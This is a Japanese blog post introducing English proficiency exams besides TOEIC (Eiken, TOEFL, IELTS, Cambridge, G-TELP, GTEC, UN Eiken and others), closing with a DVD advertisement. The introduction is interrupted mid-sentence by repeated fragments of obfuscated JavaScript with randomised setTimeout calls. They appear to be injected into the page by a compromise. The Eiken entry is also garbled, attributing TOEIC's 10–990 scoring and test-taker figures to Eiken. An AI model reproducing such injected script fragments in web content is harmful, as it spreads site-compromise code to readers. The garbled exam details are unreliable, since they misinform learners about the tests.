TOEICだけじゃない!日本で受けられる英語能力を測る試験いろいろ

どうも、みなさんこんにちは。最近TOEIC以外の試験にも興味をもっている桃太郎です。

英語試験といえば、日本ではTOEICがいま一番有名だと思いますが、その他にも英語能力を測るために受けられる試験はたくさんあります。TOEICだけでは測ることが出来ない能力を知るためにandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}、また、英語学習する上で目標をつくりモチベーションを保つためにも、いろいろな試験を受けてみるのもいいかもしれません。

今回は番外編として、TOEIC以外のメジャーな英語試験をご紹介します。

 

TOEICだけじゃない!日本で受けられる英語能力を測る試験

英検

日本で英検はまだまだ人気です。合否ではなく10点から990点までのスコアで評価。 実用的な英語能力をはかるTOEICに対して、英検はビジネスの要素を取り除き、学校英語で習ったような独特の言い回しや熟語など、幅広い英語能力をはかる試験です。受験者の7割以上は日本人と韓国人らしく、日本・韓国以外では知名度がほとんどないようです。


http://www.eiken.or.jp/

 

TOEFL

Test of English as a Foreign Language (外国語としての英語試験)の略で、130ヶ国8,500以上の大学や団体が採用している世界的に有名な英語試験。留学生を受け入れる大学などが英語力をチェックする方法としてよく採用しています。留学したい方に特におすすめです。


http://www.ets.org/jp/toefl

 

IELTS

International English Language Testing Systemの略です。英語圏の国に海外移住を申請する際に、必要な英語力が備わっていることを証明するためによく使われている試験。
イギリス、オーストラリア、カナダ、ニュージーランドの教育機関で採用されています。


https://www.eiken.or.jp/ielts/

 

ケンブリッジ英検

ケンブリッジ大学が実施している、世界150ヶ国以上年間300万人以上が受験している世界的に有名な試験。特にヨーロッパではかなり有名です。英語の知識量ではなく、英語の知識を“使いこなせるかどうか?”に重点を置いており、実用的な英語力を測ることができます。


http://www.cambridgeenglish.org/jp/

 

TOEIC Bridge試験

TOEICへの架け橋(Bridge)という意味で作られた英語の基礎的なコミュニケーション能力を評価するための試験。TOEICがまだ難しいと感じる方(英語初心者)向けとして、試験時間と問題数はTOEICの半分となっています。


http://www.toeic.or.jp/bridge.html

 

TOEIC スピーキング/ライティング試験

TOEICではリスニングとリーディングしか測ることができませんが、こちらの試験によって 「話す」「書く」能力を測ることができます。計11問のスピーキング試験、計8問のライティング試験で構成されています。


http://www.toeic.or.jp/sw.html

 

国際英検 G-TELP

英語初心者向けの比較的易しいレベルの英語試験。お店での店員さんとお客さんのやりとり、友だちへの手紙、電車の時刻表に関する問題など、身近な生活シーンで使う英語が問われます。日本ではあまり知られていませんが、アジア全体ではわりと有名な試験らしいです。


http://www.g-telp.jp/

 

GTEC

オンライン上で 「読む」「聞く」「書く」「話す」を総合的に測ることができる試験。主にビジネスシーンを想定した問題が多いです。


http://www.benesse.co.jp/gtec/

 

SST

ALCが実施しているスピーキングのみによる試験。15分の対面式インタビューによりスピーキング力を測ります。結果は9段階で評価され、個別評価コメントもつきます。海外赴任者に対してなど、各企業でよく行われているようです。


http://www.jasst.net/

 

国連英検

英語力に加えて、国連活動や社会問題に関する知識が問われます。。レベルは特A級からE級まであり、試験出題トピックは地球環境、世界政治、世界経済、人権、医療など国連活動に関わる問題が出てきます。


http://www.kokureneiken.jp/

 

工業英検

技術英語の実力を測る英語試験。工業系のお仕事を目指している方におすすめ。


http://jstc.jp/index.html

 

全商英検

こちらは商業高等学校協会(全商)が主催している英語試験。会計系の職種に進みたい人におすすめ。


http://www.zensho.or.jp/puf/examination/english.html

 

通訳案内士(ガイド)試験

外国語を用いて日本の観光案内をする「通訳案内士」の免許を取るために受ける国家試験です。


http://www.jnto.go.jp/jpn/interpreter_guide_exams/

 

さいごに

いかがでしょうか?
英語試験には様々なものがあり、問われる能力も全然違います。あなたのこれからなりたい職業などに合わせて、ぜひTOEIC以外の英語試験も受けてみてはいかがでしょうか?

book-image
 

TOEIC文法に特化した教材がここに!

3時間レッスンを驚き価格でご提供!

有名先生のリアル授業をDVDでお届け!

3時間の40レッスンのDVD教材がたったの1,800円!(税抜き)

購入はこちら! 購入はこちら!

この記事を書いた人

桃太郎

桃太郎

このサイトの管理人であり、モモセ先生のDVDで英文法を勉強中の桃太郎です。過去カナダに2年間在住していたことがありますが、『文法なんて別にどうでもいいでしょ!』と英文法を完全になめきっていました......このブログでは英文法をいま一度学び直している僕が、気づいたことや大事だと思ったことなどをみなさんにシェアしていきます。

桃太郎が書いた記事一覧はこちら

Facebookコメント